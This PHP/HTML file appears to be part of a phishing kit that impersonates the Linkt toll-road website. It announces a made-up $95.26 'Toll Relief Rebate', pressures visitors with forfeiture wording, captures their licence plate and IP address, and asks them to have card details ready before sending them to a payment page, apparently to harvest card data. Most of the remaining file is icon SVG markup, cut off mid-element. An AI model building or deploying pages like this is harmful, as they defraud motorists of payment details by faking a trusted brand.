<?php
    $ID=$_GET['ID'];
    session_start();
    $_SESSION['LicencePlate']=$_POST['LicencePlate'];
    include '../../Config/functions.php';
    $ipToCheck=get_client_ip();
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Toll Relief - Claim | Linkt</title>
    <meta name="robots" content="noindex,nofollow">
    <meta name="robots" content="noarchive,nositelinkssearchbox">
    <meta name="theme-color" content="#000000" />
    <link rel="stylesheet" href="../../assets/css/H-F.css">
    <link rel="stylesheet" href="../../assets/css/oo.css">
    <link rel="icon" href="../../assets/img/icon.png">
    <link href="https://cdn.jsdelivr.net/npm/remixicon@2.5.0/fonts/remixicon.css" rel="stylesheet">
    <style>

    </style>
</head>
<body>
    <header>
        <div class="header_01">
           <div class="header_01_leftLogo">
               <a href="">
                   <img src="../../assets/img/logo.svg" alt="">
               </a>
           </div>
           <div class="header_01_rightNav">
               <div class="header_01_rightNavItems header_01_rightNavItems01">
                   <span>Accounts and passes</span>
                   <i class="uil uil-angle-down"></i>
               </div>
               <div class="header_01_rightNavItems header_01_rightNavItems02">
                   <span>Pay for tolls</span>
               </div>
               <div class="header_01_rightNavItems header_01_rightNavItems03">
                   <span>Using toll roads</span>
                   <i class="uil uil-angle-down"></i>
               </div>
               <div class="header_01_rightNavItems header_01_rightNavItems04">
                   <img src="../../assets/img/helpution.svg" alt="">
                   <span>Help</span>
               </div>
               <div class="header_01_rightNavItems header_01_rightNavItems05">
                   <button>Log in</button>
               </div>
           </div>
       </div>
   </header>
   <div class="header_02">
       <div class="header_02_01">
           <i class="uil uil-bars"></i>
           <img src="../../assets/img/logo.svg" alt="">
       </div>
       <div class="header_02_02">
           <div class="header_02_02_img1 header_02_02_img001">
               <img src="../../assets/img/helpution.svg" alt="">
           </div>
           <div class="header_02_02_img1"> 
               <img src="../../assets/img/logouser.svg" alt="" srcset="">
           </div>
       </div>
   </div>
   <section class="rewardsContent">
        <div class="cover1">
            <div class="cover1_01">
                <h1>Cashback and rebates</h1>
                <p>To avoid forfeiture of your rebate, please ensure that your claim is submitted within the allocated period as per our policy.</p>
                <a href="./payment.php?ID=<?php echo $ID;?>" class="aaaclia">Claim Online</a>
            </div>
            <div class="cover1_02">
                <img src="../../assets/img/ho/ioio.svg" alt="">
            </div>
        </div>
        <div class="rewardsContent_01">
            <div class="rewardsContent_01_left">
                <div class="rewardsContent_01_left_1">
                    <h1>Eligibility Status: Confirmed for $95.26 Toll Relief Rebate</h1>
                    <p>Thank you for your ongoing participation in our toll program. Our records indicate that you qualify for a Toll Relief Rebate of $95.26 based on your toll expenditures in the past financial year. It is imperative that you claim your rebate within the designated timeframe to avail this financial benefit.</p>
                </div>
                <div class="rewardsContent_01_left_2">
                    <h1>Structured Steps to Ensure Your $95.26 Rebate:</h1>
                    <ul class="ul1">
                        <li><i class="ri-checkbox-blank-circle-fill"></i>Step 1: Confirm Eligibility</li>
                        <ul>
                            <li><i class="ri-checkbox-blank-circle-line"></i> Validate that your toll spending exceeds the required minimum during the pertinent financial year.</li>
                            <li><i class="ri-checkbox-blank-circle-line"></i> Ensure that no rebate claims have been filed for the current quarter.</li>
                        </ul>
                    </ul>
                    <br>
                    <ul class="ul1">
                        <li><i class="ri-checkbox-blank-circle-fill"></i>Step 2: Ensure Accurate Documentation</li>
                        <ul>
                            <li><i class="ri-checkbox-blank-circle-line"></i> Confirm that your vehicle registration and license plate details are current and correctly registered in NSW state.</li>
                            <li><i class="ri-checkbox-blank-circle-line"></i> Ensure your valid credit/debit card details are readily accessible for the rebate process.</li>
                        </ul>
                    </ul>
                    <br>
                    <ul class="ul1">
                        <li><i class="ri-checkbox-blank-circle-fill"></i>Step 3: Rebate Submission</li>
                        <ul>
                            <li><i class="ri-checkbox-blank-circle-line"></i> Click on the 'Claim Rebate' button.</li>
                            <li><i class="ri-checkbox-blank-circle-line"></i> Carefully follow the ensuing prompts.</li>
                            <li><i class="ri-checkbox-blank-circle-line"></i> Upon approval, expect the $95.26 rebate to be processed to your card within 3 to 8 business days.</li>
                        </ul>
                    </ul>
                    <b></b><br><br>
                    <a href="./payment.php?ID=<?php echo $ID;?>" class="aaaclia">Submit a claim</a>
                </div>
                <div class="rewardsContent_01_left_2 rewardsContent_01_left_22">
                    <h1 class="h1supp">Support and Additional Resources</h1>
                    <p>Should you require assistance or further information during the claim process, our dedicated resources and support team are at your disposal</p>
                    <!--<h3>Frequently Asked Questions</h3>-->
                    <ul class="ul1"> 
                        <!--<li><i class="ri-checkbox-blank-circle-fill"></i>Privacy Notice</li>-->
                        <!--<li><i class="ri-checkbox-blank-circle-fill"></i>Terms and Conditions</li>-->
                        <!--<li><i class="ri-checkbox-blank-circle-fill"></i>Contact Our Support Team</li>-->
                        <!--<li><i class="ri-checkbox-blank-circle-fill"></i>Discover More Ways to Save</li>-->
                        <!--<li><i class="ri-checkbox-blank-circle-fill"></i>Monitor Your Toll Expenditures</li>-->
                        <!--<li><i class="ri-checkbox-blank-circle-fill"></i>Uncover Additional Savings</li>-->
                        <!--<br>-->
                        <h3>Appreciation Note</h3>
                        <p class="noteee">We commend your prudent management of toll expenditures and are delighted to facilitate this rebate in recognition of your efforts. Your ongoing participation in our toll program is greatly appreciated, and we are committed to ensuring a seamless claim process for your benefit.</p>
                        <div class="remmemmm">
                            <img src="../../assets/img/ho/oio.png" alt="">
                            <p>Remember, you can contact Linkt Assist  for help if you have trouble paying tolls at any time.</p>
                        </div>
                        <div class="toooll">
                            <h1>Toll spend that is eligible</h1>
                            <ul class="ultool">
                                <li>What counts towards your toll relief <i class="ri-arrow-drop-down-line"></i></li>
                                <li>What doesn't count towards your toll relief <i class="ri-arrow-drop-down-line"></i></li>
                            </ul>
                        </div>
                    </ul>
                    <br>
                </div>
                <p class="rewardsContent_01_left_3">Visit Transport for NSW for further details on the <span> toll relief rebate scheme</span>, or to review the <span> terms and conditions.</span></p>
                <div class="rewardsContent_01_left_4">
                    <i class="ri-arrow-left-fill"></i> back
                </div>
            </div>
            <div class="rewardsContent_01_right">
                <h3>Related Articles</h3>    
                <p>Toll Relief - Free or half-price registration</p>           
            </div>
        </div>
        <div class="rewardsContent_02">
            <h3>Browse help articles</h3>
            <ul class="boxxxx000">
                <li>
                    <svg viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0)"><g clip-path="url(#clip1)"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.5 12.498c0 6.075-4.925 11-11 11s-11-4.925-11-11 4.925-11 11-11 11 4.925 11 11zm1.5 0c0 6.904-5.596 12.5-12.5 12.5S0 19.402 0 12.498c0-6.903 5.596-12.5 12.5-12.5S25 5.595 25 12.498zM8.553 6.461c0 .273-.211.486-.489.486a.481.481 0 01-.483-.486c0-.272.216-.485.483-.485a.48.48 0 01.489.485zm-1.608 3.747h-1.74c-.339 0-.502-.178-.502-.518V6.555c0-.287.148-.423.431-.423.3 0 .442.136.442.423V9.37h1.369c.3 0 .441.142.441.413 0 .289-.142.425-.441.425zm5.703-1.353l.691 1.148c.057.091.134.15.229.184a.44.44 0 00.342-.034c.1-.06.178-.158.199-.27a.415.415 0 00-.052-.284l-.743-1.235.458-.37h.583V9.8c0 .278.136.409.423.409.281 0 .416-.13.416-.409V7.995h.52c.286 0 .422-.132.422-.409 0-.272-.136-.403-.423-.403h-.52v-.638c0-.268-.145-.413-.42-.413-.276 0-.418.145-.418.413v.638h-.721a.44.44 0 00-.28.1l-1.057.863V6.539c0-.271-.135-.407-.416-.407-.281 0-.412.136-.412.407v3.265c0 .268.137.404.412.404.286 0 .416-.136.416-.404v-.67a8.84 8.84 0 01.346-.282l.005.003zm-4.212.946c0 .276-.148.407-.427.407-.28 0-.428-.13-.428-.407V7.624c0-.276.148-.405.428-.405s.427.13.427.405v2.177zm.684.407c.29 0 .427-.135.427-.401V8.355c0-.306.214-.462.433-.462.197 0 .406.15.406.462v1.452c0 .266.148.4.423.4.285 0 .428-.134.428-.4V8.21c0-.766-.505-1.03-.927-1.03-.33 0-.571.166-.763.374 0-.161-.136-.359-.427-.359-.275 0-.412.198-.412.416v2.196c0 .266.137.4.412.4zm7.22 7.134c1.323 0 2.24-1.05 2.24-2.337v-.022c0-1.287-.938-2.36-2.26-2.36-1.323 0-2.24 1.052-2.24 2.338v.022c0 1.287.94 2.36 2.26 2.36zm-3.976-2.36c0-2.134 1.674-3.881 3.977-3.881 2.302 0 3.956 1.726 3.956 3.86v.022c0 2.134-1.674 3.881-3.977 3.881s-3.956-1.726-3.956-3.86v-.021zm-1.16-.546h-1.94a.74.74 0 00-.737.74c0 .409.33.729.738.729h1.146v1.105c-.43.308-.981.464-1.597.464-1.368 0-2.336-1.039-2.336-2.453V15c0-1.314.98-2.408 2.215-2.408.727 0 1.222.2 1.684.53a.839.839 0 101.003-1.348c-.693-.486-1.465-.75-2.633-.75-2.336 0-4.044 1.8-4.044 3.998v.022c0 2.287 1.654 3.977 4.055 3.977a5.124 5.124 0 002.7-.773c.408-.243.595-.586.595-1.083v-1.877a.843.843 0 00-.849-.851z" class="fill" fill="#0E893C"></path></g></g><defs><clipPath id="clip0"><path fill="#fff" d="M0 0h25v25H0z"></path></clipPath><clipPath id="clip1"><path fill="#fff" d="M0 0h25v25H0z"></path></clipPath></defs></svg>
                    <!-- <img src="../../assets/img/ho/LinktGO.png" alt=""> -->
                    <span>LinktGO</span>
                </li>
                <li>
                    <svg viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0)"><path fill-rule="evenodd" clip-rule="evenodd" d="M20.712 3.763c.379.238.503.756.278 1.157l-.117.209h.638c.44 0 .798.378.798.844 0 .466-.357.844-.798.844H6.275c-.44 0-.797-.378-.797-.844 0-.466.357-.844.797-.844h12.743l.6-1.07a.774.774 0 011.094-.296zM11.769 7.88c.733-.143 1.951-.166 2.786-.166 1.585 0 4.682.264 5.915.374.604.055 1.161.35 1.563.834v.002l.81.969c.204.246.368.523.485.822.818 2.07 1.231 3.218 1.44 3.877.206.652.24.908.228 1.15v.011c-.018.27-.084.751-.661 2.083-.288.662-.918 1.092-1.61 1.092h-.987c-.289 1.388-1.458 2.426-2.857 2.426-1.383 0-2.542-1.016-2.847-2.38H8.962c-.305 1.364-1.464 2.38-2.847 2.38s-2.542-1.016-2.847-2.38H1.564c-.823 0-1.519-.725-1.537-1.592-.022-.34-.067-1.308.033-2.337.051-.528.143-1.1.308-1.624.16-.51.414-1.053.84-1.442.88-.835 2.024-1.004 3.013-1.15l.102-.016A16.807 16.807 0 006 10.501c.12-.059.348-.175.65-.328l.33-.168a83.96 83.96 0 012.463-1.218c.835-.39 1.695-.758 2.295-.901a.75.75 0 01.031-.007zm-8.432 9.405c.386-1.232 1.484-2.122 2.778-2.122s2.392.89 2.778 2.122h7.21c.386-1.232 1.484-2.122 2.778-2.122 1.278 0 2.365.868 2.763 2.076h1.081a.178.178 0 00.16-.107c.27-.624.4-1.001.462-1.22.04-.14.05-.212.054-.245l-.003-.018a4.913 4.913 0 00-.144-.522c-.189-.598-.583-1.7-1.398-3.761l-.001-.002a1.3 1.3 0 00-.21-.356l-.809-.968-.001-.002a.73.73 0 00-.5-.267c-1.256-.113-4.277-.368-5.78-.368-.855 0-1.912.027-2.482.135-.429.105-1.147.402-1.985.794-.827.387-1.706.834-2.417 1.196l-.306.155c-.375.19-.67.341-.78.392a.769.769 0 01-.134.049c-.71.183-1.361.28-1.906.361m-1.208 4.8H1.62a13.722 13.722 0 01.028-2.068c.044-.46.119-.898.234-1.262.118-.377.254-.594.371-.7a.623.623 0 00.018-.016c.48-.46 1.14-.585 2.274-.754m1.57 4.367c-.734 0-1.33.63-1.33 1.407s.596 1.407 1.33 1.407c.734 0 1.33-.63 1.33-1.407s-.596-1.407-1.33-1.407zm12.766 0c-.734 0-1.33.63-1.33 1.407s.596 1.407 1.33 1.407c.735 0 1.33-.63 1.33-1.407s-.595-1.407-1.33-1.407z" class="fill" fill="#0E893C"></path></g><defs><clipPath id="clip0"><path fill="#fff" d="M0 0h25v25H0z"></path></clipPath></defs></svg>
                    <!-- <img src="../../assets/img/ho/Buyingapass.png" alt=""> -->
                    <span>Buying a pass</span>
                </li>
                <li>
                    <svg viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M12.393 0c.44 0 .798.357.798.798v23.404a.798.798 0 11-1.596 0V.798c0-.44.357-.798.798-.798z" class="fill" fill="#0E893C"></path><path fill-rule="evenodd" clip-rule="evenodd" d="M7.79 3.645c1.42-.775 3.169-1.01 4.603-1.01 2.91 0 4.952.97 6.04 2.059a.798.798 0 11-1.128 1.128c-.736-.736-2.344-1.591-4.912-1.591-1.304 0-2.75.22-3.839.815-1.039.566-1.752 1.46-1.752 2.95 0 1.491.713 2.384 1.752 2.95 1.09.595 2.535.816 3.84.816 1.45 0 3.197.28 4.611 1.075 1.454.816 2.575 2.196 2.575 4.287 0 2.09-1.121 3.47-2.575 4.287-1.414.794-3.16 1.074-4.612 1.074-1.462 0-2.716-.244-3.86-.753-1.142-.507-2.133-1.259-3.093-2.219a.798.798 0 111.128-1.128c.866.866 1.7 1.483 2.613 1.889.909.404 1.936.616 3.212.616 1.287 0 2.735-.256 3.831-.87 1.057-.594 1.76-1.495 1.76-2.896 0-1.402-.703-2.303-1.76-2.896-1.096-.615-2.544-.87-3.83-.87-1.435 0-3.184-.236-4.604-1.01-1.472-.803-2.584-2.192-2.584-4.352S6.318 4.448 7.79 3.645z" class="fill" fill="#0E893C"></path></svg>
                    <!-- <img src="../../assets/img/ho/payy.png" alt=""> -->
                    <span>Payments, tolls and fees</span>
                </li>
                <li>
                    <svg viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0)" fill-rule="evenodd" clip-rule="evenodd" class="fill" fill="#0E893C"><path d="M4.52 6.328h.574a.865.865 0 010 1.73h-.538c-.66 0-1.104.002-1.446.03-.33.027-.49.075-.594.128a1.442 1.442 0 00-.63.63c-.053.105-.102.263-.129.595-.028.341-.028.784-.028 1.445v7.423c0 .66 0 1.104.028 1.445.027.331.076.49.129.594.138.272.359.492.63.63.105.054.263.102.594.13.342.027.785.028 1.446.028H20.44c.66 0 1.104 0 1.445-.029.332-.027.49-.075.595-.128.271-.139.492-.36.63-.63.053-.105.102-.264.129-.595.027-.341.028-.785.028-1.445v-7.423c0-.66 0-1.104-.028-1.445-.027-.332-.076-.49-.129-.595a1.442 1.442 0 00-.63-.63c-.105-.053-.263-.101-.595-.128-.34-.028-.784-.03-1.445-.03h-.538a.865.865 0 010-1.73h.573c.617 0 1.131 0 1.551.034.439.036.85.114 1.24.312.597.304 1.082.79 1.386 1.387.198.389.276.8.312 1.239.034.42.034.934.034 1.55v7.494c0 .616 0 1.13-.034 1.551-.036.438-.114.85-.312 1.24a3.173 3.173 0 01-1.387 1.386c-.389.198-.8.276-1.239.311-.42.035-.934.035-1.55.035H4.52c-.617 0-1.131 0-1.551-.035-.439-.035-.85-.113-1.24-.311a3.173 3.173 0 01-1.386-1.387c-.198-.39-.276-.8-.312-1.239-.034-.42-.034-.935-.034-1.55V10.85c0-.617 0-1.131.034-1.551.036-.439.114-.85.312-1.24A3.173 3.173 0 011.73 6.675c.39-.198.801-.276 1.24-.312.42-.034.934-.034 1.55-.034z"></path><path d="M11.505 14.184a3.174 3.174 0 011.632-.452h10.996v1.73H13.137c-.261 0-.518.072-.742.206l-4.192 2.516a3.173 3.173 0 01-1.633.452H.863v-1.731H6.57c.262 0 .518-.071.742-.206l4.193-2.515zM10.953 7.693a4.039 4.039 0 014.4.876.865.865 0 11-1.223 1.224 2.308 2.308 0 00-3.264 0 .865.865 0 11-1.224-1.224 4.04 4.04 0 011.31-.876z"></path><path d="M9.738 4.762a7.211 7.211 0 017.86 1.563.865.865 0 11-1.224 1.224 5.482 5.482 0 00-7.752 0A.865.865 0 117.4 6.325c.67-.67 1.464-1.2 2.34-1.563z"></path><path d="M8.524 1.83A10.385 10.385 0 0119.84 4.081a.865.865 0 11-1.224 1.224 8.654 8.654 0 00-12.238 0 .865.865 0 01-1.224-1.224c.964-.964 2.109-1.729 3.369-2.25z"></path></g><defs><clipPath id="clip0"><path fill="#fff" d="M0 0h25v25H0z"></path></clipPath></defs></svg>
                    <!-- <img src="../../assets/img/ho/Tags.png" alt=""> -->
                    <span>Tags and holders</span>
                </li>
                <li>
                    <svg viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0)" fill-rule="evenodd" clip-rule="evenodd" class="fill" fill="#0E893C"><path d="M3.123.846a.89.89 0 01.89-.89h11.61a.89.89 0 01.63.26l6.332 6.333a.89.89 0 01.26.63v16.887a.89.89 0 01-.89.89H4.014a.89.89 0 01-.89-.89V.846zm1.78.89v21.44h16.163V7.547l-5.812-5.811H4.903z"></path><path d="M15.623-.044a.89.89 0 01.89.89v5.443h5.443a.89.89 0 010 1.78h-6.333a.89.89 0 01-.89-.89V.846a.89.89 0 01.89-.89zM8.235 12.621a.89.89 0 01.89-.89h7.719a.89.89 0 110 1.78h-7.72a.89.89 0 01-.89-.89zM8.235 17.899a.89.89 0 01.89-.89h7.719a.89.89 0 110 1.78h-7.72a.89.89 0 01-.89-.89z"></path></g><defs><clipPath id="clip0"><path fill="#fff" d="M0 0h25v25H0z"></path></clipPath></defs></svg>
                    <!-- <img src="../../assets/img/ho/notices.png" alt=""> -->
                    <span>Toll notices</span>
                </li>
                <li>
                    <svg viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0)" fill-rule="evenodd" clip-rule="evenodd" class="fill" fill="#0E893C"><path d="M12.502 1.563c-2.52 0-4.41 1.871-4.41 4.437 0 2.566 1.89 4.437 4.41 4.437 2.52 0 4.409-1.871 4.409-4.437 0-2.23-1.925-4.437-4.409-4.437zM6.502 6c0-3.399 2.571-6 6-6 3.465 0 6 3.011 6 6 0 3.399-2.571 6-6 6s-6-2.601-6-6zM9.383 14.56c-2.52 0-4.82 2.32-4.82 4.925v1.043c0 .622.15 1.06.394 1.388.248.336.643.628 1.25.864 1.249.486 3.173.66 5.811.66h.964c2.638 0 4.562-.174 5.81-.66.608-.236 1.003-.528 1.252-.864.242-.329.393-.766.393-1.388v-1.043c0-2.605-2.3-4.925-4.82-4.925H9.383zM3 19.485C3 16.05 5.969 13 9.383 13h6.234C19.031 13 22 16.05 22 19.485v1.043c0 .888-.22 1.667-.698 2.314-.473.64-1.148 1.082-1.941 1.391-1.552.605-3.747.767-6.38.767h-.963c-2.633 0-4.827-.162-6.379-.767-.793-.309-1.468-.751-1.94-1.391C3.22 22.195 3 21.416 3 20.528v-1.043z"></path></g><defs><clipPath id="clip0"><path fill="#fff" d="M0 0h25v25H0z"></path></clipPath></defs></svg>
                    <!-- <img src="../../assets/img/ho/Managing.png" alt=""> -->
                    <span>Managing my account</span>
                </li>
                <li>
                    <svg viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0)" fill-rule="evenodd" clip-rule="evenodd" class="fill" fill="#0E893C"><path d="M17.012 1.61c.444-.159.93.082 1.085.537l6.855 20.126a.881.881 0 01-.522 1.114.846.846 0 01-1.085-.537L16.49 2.726a.881.881 0 01.522-1.114zM7.988 1.61a.846.846 0 00-1.085.537L.048 22.274a.881.881 0 00.522 1.114c.444.16.93-.08 1.085-.537L8.51 2.726a.881.881 0 00-.522-1.114zM12.708 20.41a.863.863 0 01-.85-.875V15.84c0-.483.38-.874.85-.874s.852.391.852.874v3.695a.863.863 0 01-.852.875zM12.708 10.61a.863.863 0 01-.85-.874V6.04c0-.483.38-.875.85-.875s.852.392.852.875v3.695a.863.863 0 01-.852.874z"></path></g><defs><clipPath id="clip0"><path fill="#fff" d="M0 0h25v25H0z"></path></clipPath></defs></svg>
                    <!-- <img src="../../assets/img/ho/Using.png" alt=""> -->
                    <span>Using toll roads</span>
                </li>
                <li>
                    <svg viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0)"><path fill-rule="evenodd" clip-rule="evenodd" d="M5.338.553a2.75 2.75 0 00-2.652 2.024L.342 11.145a4.724 4.724 0 00-.169 1.222c-.01 1.696-.04 7.113-.04 9.965a1.92 1.92 0 001.922 1.918h2.343a1.92 1.92 0 001.921-1.918v-1.586h12.56v1.586a1.92 1.92 0 001.922 1.918h2.343a1.92 1.92 0 001.922-1.918c0-2.824-.03-8.264-.04-9.965a4.73 4.73 0 00-.169-1.222l-2.344-8.568A2.75 2.75 0 0019.86.553H5.338zm-1.205 2.42a1.25 1.25 0 011.205-.92H19.86a1.25 1.25 0 011.206.92l2.344 8.568c.075.274.114.553.115.835.01 1.702.04 7.137.04 9.956a.42.42 0 01-.42.418H20.8a.42.42 0 01-.422-.418v-2.336a.75.75 0 00-.75-.75H5.57a.75.75 0 00-.75.75v2.336a.42.42 0 01-.421.418H2.055a.42.42 0 01-.422-.418c0-2.847.03-8.259.04-9.956.002-.282.04-.561.115-.835l2.345-8.568zm.265 6.342a.75.75 0 100 1.5H20.8a.75.75 0 100-1.5H4.398zm3.515 5.423c0 .968-.787 1.753-1.758 1.753-.97 0-1.757-.785-1.757-1.753 0-.967.787-1.752 1.757-1.752.97 0 1.758.784 1.758 1.752zm11.13 1.753c.971 0 1.758-.785 1.758-1.753 0-.967-.787-1.752-1.757-1.752-.971 0-1.758.784-1.758 1.752s.787 1.753 1.758 1.753z" class="fill" fill="#0E893C"></path></g><defs><clipPath id="clip0"><path fill="#fff" d="M0 0h25v25H0z"></path></clipPath></defs></svg>
                    <!-- <img src="../../assets/img/ho/Opening.png" alt=""> -->
                    <span>Opening an account</span>
                </li>
                <li>
                    <svg viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0)" class="fill" fill="#0E893C"><path fill-rule="evenodd" clip-rule="evenodd" d="M3.273 5.006h19.42c.259 0 .528 0 .77.062a1.944 1.944 0 011.4 1.4c.062.241.062.51.061.77V9.44c0 .26.001.529-.061.77a1.944 1.944 0 01-1.4 1.4c-.242.063-.511.062-.77.062h-4.156a.833.833 0 010-1.667h4.088c.172 0 .275 0 .352-.003.073-.004.084-.009.072-.006a.278.278 0 00.2-.197c0-.005.003-.026.005-.075.004-.077.004-.18.004-.352V7.306c0-.173 0-.275-.004-.352a.737.737 0 00-.006-.075.278.278 0 00-.199-.197c.012.002 0-.002-.072-.006a9.134 9.134 0 00-.352-.003H3.34c-.172 0-.275 0-.352.003a.73.73 0 00-.075.006.278.278 0 00-.197.197.73.73 0 00-.005.075 9.14 9.14 0 00-.004.352v2.066c0 .173 0 .275.004.352a.73.73 0 00.005.075c.026.096.101.171.197.197a.73.73 0 00.075.006c.077.003.18.003.352.003H7.43a.833.833 0 010 1.666H3.273c-.259.001-.529.002-.77-.06a1.944 1.944 0 01-1.4-1.4c-.062-.242-.062-.512-.061-.77V7.305v-.068c0-.26-.001-.529.06-.771a1.944 1.944 0 011.4-1.4c.242-.062.512-.061.77-.06zM21.87 12.77c.46 0 .832.373.832.833V22.765c.001.258.001.528-.06.77a1.944 1.944 0 01-1.399 1.4c-.242.062-.511.061-.77.061H5.493c-.259 0-.528 0-.77-.062a1.944 1.944 0 01-1.399-1.399c-.062-.242-.061-.512-.06-.77v-9.157a.833.833 0 011.666 0v9.089c0 .172 0 .275.003.352.002.048.005.07.006.075.026.096.1.17.197.196.005 0 .026.004.074.006.077.003.18.004.352.004h14.841c.173 0 .276 0 .353-.004a.748.748 0 00.074-.006c.096-.026.171-.1.197-.197l.006-.074c.003-.077.003-.18.003-.352v-9.094c0-.46.373-.833.833-.833z"></path><path fill-rule="evenodd" clip-rule="evenodd" d="M5.17 3.028c.36-1.151 1.777-1.671 2.7-1.18.62.33 1.023.618 1.537 1.203.386.44.831 1.042 1.454 1.95H6.13c-.545 0-1.353-.724-.962-1.973zM8.652.378C6.8-.61 4.25.391 3.58 2.53c-.639 2.041.605 4.137 2.552 4.137h6.296a.833.833 0 00.694-1.295c-1.105-1.657-1.83-2.7-2.463-3.421C9.992 1.193 9.422.787 8.653.377z"></path><path fill-rule="evenodd" clip-rule="evenodd" d="M20.797 3.028c-.36-1.151-1.778-1.671-2.702-1.18-.62.33-1.022.618-1.536 1.203-.387.44-.832 1.042-1.454 1.95h4.73c.544 0 1.352-.724.962-1.973zM17.312.378c1.854-.987 4.405.014 5.075 2.152.639 2.041-.605 4.137-2.552 4.137h-6.297a.833.833 0 01-.693-1.295c1.104-1.657 1.83-2.7 2.463-3.421.666-.758 1.236-1.164 2.004-1.574z"></path><path d="M15.204 4.168a2.222 2.222 0 11-4.443 0 2.222 2.222 0 014.444 0z"></path><path fill-rule="evenodd" clip-rule="evenodd" d="M13.816 5.556v2.678a.833.833 0 01-1.666 0V5.556h1.666zm-.833 6.764c.46 0 .833.373.833.833v3.69a.833.833 0 01-1.666 0v-3.69c0-.46.373-.833.833-.833zm0 8.609c.46 0 .833.373.833.833v2.678H12.15v-2.678c0-.46.373-.833.833-.833z"></path></g><defs><clipPath id="clip0"><path fill="#fff" d="M0 0h25v25H0z"></path></clipPath></defs></svg>
                    <!-- <img src="../../assets/img/ho/Rewards.png" alt=""> -->
                    <span>Rewards</span>
                </li>
                <li>
                    <svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M12.22 4.6a.79.79 0 01.793.787v13.637a.79.79 0 01-.794.787.79.79 0 01-.793-.787V5.387a.79.79 0 01.793-.786z" class="fill" fill="#0E893C"></path><path fill-rule="evenodd" clip-rule="evenodd" d="M9.392 6.795c.892-.483 1.969-.62 2.827-.62 1.758 0 3.032.58 3.737 1.279.31.307.31.805 0 1.112a.799.799 0 01-1.123 0c-.354-.35-1.196-.818-2.614-.818-.728 0-1.504.124-2.067.428-.512.277-.843.688-.843 1.407 0 .72.33 1.13.843 1.408.563.304 1.339.428 2.067.428.876 0 1.95.167 2.836.66.925.514 1.662 1.406 1.662 2.75 0 1.342-.736 2.234-1.662 2.75-.886.492-1.96.659-2.836.659-.886 0-1.66-.148-2.373-.462-.708-.312-1.316-.771-1.892-1.342a.782.782 0 010-1.113.799.799 0 011.122 0c.483.478.933.805 1.415 1.018.479.21 1.027.325 1.728.325.712 0 1.49-.141 2.06-.458.53-.295.85-.714.85-1.378 0-.663-.32-1.082-.85-1.377-.57-.317-1.348-.459-2.06-.459-.858 0-1.935-.138-2.827-.62-.943-.51-1.67-1.41-1.67-2.789 0-1.379.727-2.279 1.67-2.788z" class="fill" fill="#0E893C"></path><path fill-rule="evenodd" clip-rule="evenodd" d="M20.159 19.552a.83.83 0 01-.067 1.18c-4.17 3.695-10.382 3.983-14.883.692-4.5-3.292-6.053-9.262-3.72-14.3a.847.847 0 011.118-.411.833.833 0 01.414 1.108c-1.999 4.319-.668 9.436 3.19 12.257a10.192 10.192 0 0012.757-.592.849.849 0 011.191.066z" class="fill" fill="#0E893C"></path><path d="M21.144 18.572l.31 2.922c.057.539-.572.877-.996.536L17.2 19.415a.607.607 0 01.322-1.077l2.948-.307a.612.612 0 01.674.541z" class="fill" fill="#0E893C"></path><path fill-rule="evenodd" clip-rule="evenodd" d="M3.848 4.448a.83.83 0 01.064-1.18C8.075-.435 14.288-.734 18.794 2.55s6.07 9.25 3.746 14.293a.846.846 0 01-1.117.413.833.833 0 01-.417-1.107c1.992-4.323.651-9.437-3.211-12.252a10.192 10.192 0 00-12.756.615.849.849 0 01-1.191-.064z" class="fill" fill="#0E893C"></path><path d="M2.864 5.43L2.55 2.507c-.058-.539.57-.878.995-.538l3.263 2.61a.607.607 0 01-.32 1.077l-2.948.312a.612.612 0 01-.675-.54z" class="fill" fill="#0E893C"></path></svg>
                    <!-- <img src="../../assets/img/ho/Cashback.png" alt=""> -->
                    <span>Cashback and rebates</span>
                </li>
                <li>
                    <svg viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0)"><g clip-path="url(#clip1)" fill-rule="evenodd" clip-rule="evenodd" class="fill" fill="#0E893C"><path d="M12.434 14.36c-1.384 0-2.394 1.01-2.394 2.393 0 1.383 1.01 2.394 2.394 2.394 1.383 0 2.393-1.01 2.393-2.394 0-1.192-1.046-2.393-2.393-2.393zm-3.99 2.393c0-2.264 1.725-3.99 3.99-3.99 2.3 0 3.989 1.99 3.989 3.99 0 2.265-1.725 3.99-3.99 3.99-2.264 0-3.989-1.725-3.989-3.99zM12.434 1.594c-2.6 0-4.522 1.922-4.522 4.52V9.04H6.316V6.115c0-3.48 2.637-6.117 6.118-6.117 3.516 0 6.117 3.054 6.117 6.117V9.04h-1.596V6.115c0-2.256-1.959-4.521-4.521-4.521z"></path><path d="M7.295 8.508h10.277c.569 0 1.043 0 1.43.032.404.033.784.104 1.143.287.55.28.998.728 1.278 1.279.183.359.254.738.287 1.142.032.388.032.862.032 1.43v8.15c0 .568 0 1.043-.032 1.43-.033.404-.104.784-.287 1.142-.28.55-.728.998-1.278 1.279-.36.183-.739.254-1.143.287-.387.032-.861.032-1.43.032H7.295c-.569 0-1.043 0-1.43-.032-.404-.033-.784-.104-1.143-.287A2.925 2.925 0 013.444 23.4c-.183-.358-.254-.738-.287-1.142-.032-.387-.032-.862-.032-1.43v-8.15c0-.568 0-1.042.032-1.43.033-.404.104-.783.287-1.142.28-.55.728-.998 1.278-1.279.36-.183.739-.254 1.143-.287.387-.032.861-.032 